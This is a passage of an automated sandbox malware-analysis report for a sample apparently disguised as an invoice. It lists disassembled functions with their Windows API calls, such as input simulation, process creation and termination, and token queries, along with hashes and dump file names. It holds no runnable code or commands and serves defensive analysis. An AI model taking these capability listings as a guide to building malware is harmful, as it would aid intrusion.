                                          • ShowWindow.USER32(00000000,00000004,?,0048B5A8,?,?), ref: 0048B7A8
                                          • EnableWindow.USER32(00000000,00000001), ref: 0048B7CC
                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048B7EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          • Opcode ID: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                                          • Instruction ID: 1d3b34d551e73e97491640bec01ce8c12bc83bc2c135b759935fb039f22faf4f
                                          • Opcode Fuzzy Hash: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                                          • Instruction Fuzzy Hash: 1941A834600340AFDB21DF28C499B9A7BE0FF49310F5845BAF9488F762C735A856CB94
                                          Function 0047709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                                            • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                                          • GetDesktopWindow.USER32 ref: 004770D6
                                          • GetWindowRect.USER32(00000000), ref: 004770DD
                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                                            • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                          • GetCursorPos.USER32(?), ref: 0047713B
                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                          • String ID:
                                          • API String ID: 4137160315-0
                                          • Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                          • Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
                                          • Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                          • Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
                                          Function 00458879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                            • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                            • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                            • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                            • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                          • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                                          • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                                          • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                                          • HeapFree.KERNEL32(00000000), ref: 00458911
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                          • String ID:
                                          • API String ID: 3008561057-0
                                          • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                          • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                                          • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                          • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
                                          Function 004585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                                          • CloseHandle.KERNEL32(00000004), ref: 00458603
                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                          • String ID:
                                          • API String ID: 1413079979-0
                                          • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                          • Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
                                          • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                          • Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
                                          Function 0045B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0045B7B5
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0045B7C6
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045B7CD
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0045B7D5
                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0045B7EC
                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0045B7FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1035833867-0
                                          • Opcode ID: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
                                          • Instruction ID: ebab011a078b8c66a555392ea924b50fda774449f62ca66a232c327e230173f3
                                          • Opcode Fuzzy Hash: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
                                          • Instruction Fuzzy Hash: ED018475E00209BBEF109BE69C49A5EBFB8EB48711F00407AFE04A7291D6309C14CF94
                                          Function 00420162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Virtual
                                          • String ID:
                                          • API String ID: 4278518827-0
                                          • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                          • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                                          • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                          • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                                          Function 004653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                          • String ID:
                                          • API String ID: 839392675-0
                                          • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                          • Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
                                          • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                          • Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9
                                          Function 00467230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                                          • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                                            • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                                          • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          • Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                          • Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
                                          • Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                          • Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59
                                          Function 00458992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                                          • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                                          • CloseHandle.KERNEL32(?), ref: 004589B2
                                          • CloseHandle.KERNEL32(?), ref: 004589BA
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                                          • HeapFree.KERNEL32(00000000), ref: 004589CA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                          • String ID:
                                          • API String ID: 146765662-0
                                          • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                          • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                                          • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                          • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                                          Function 00457530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                          Download Yara Rule
                                          APIs
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                                          • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                                          • _memcmp.LIBCMT ref: 00457748
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FromProg$FreeTask_memcmp
                                          • String ID: ,,I
                                          • API String ID: 314563124-4163367948
                                          • Opcode ID: 947aafcc5355d7d4454fef49f7e6cd79d9861281e848203aa0a317f96205b2d7
                                          • Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
                                          • Opcode Fuzzy Hash: 947aafcc5355d7d4454fef49f7e6cd79d9861281e848203aa0a317f96205b2d7
                                          • Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64
                                          Function 004785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00478613
                                          • CharUpperBuffW.USER32(?,?), ref: 00478722
                                          • VariantClear.OLEAUT32(?), ref: 0047889A
                                            • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                                            • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                                            • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                          • API String ID: 4237274167-1221869570
                                          • Opcode ID: 332034fd6ca578468b57f7b7a1e811b17ad40028d9d2093941ac43483d342d7e
                                          • Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
                                          • Opcode Fuzzy Hash: 332034fd6ca578468b57f7b7a1e811b17ad40028d9d2093941ac43483d342d7e
                                          • Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56
                                          Function 00462A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                          • _memset.LIBCMT ref: 00462B87
                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                          • String ID: 0
                                          • API String ID: 4152858687-4108050209
                                          • Opcode ID: b89093a998e3cf012ea480837d41f08897d95beaf01e83ce83b987816d7c9aa6
                                          • Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
                                          • Opcode Fuzzy Hash: b89093a998e3cf012ea480837d41f08897d95beaf01e83ce83b987816d7c9aa6
                                          • Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B
                                          Function 00413137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove$_free
                                          • String ID: 3cA$_A
                                          • API String ID: 2620147621-3480954128
                                          • Opcode ID: ef0129cd5816ec15a45b032bd3f3c56bb013280cf55210c9ba5302c07174546d
                                          • Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
                                          • Opcode Fuzzy Hash: ef0129cd5816ec15a45b032bd3f3c56bb013280cf55210c9ba5302c07174546d
                                          • Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A
                                          Function 00416192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
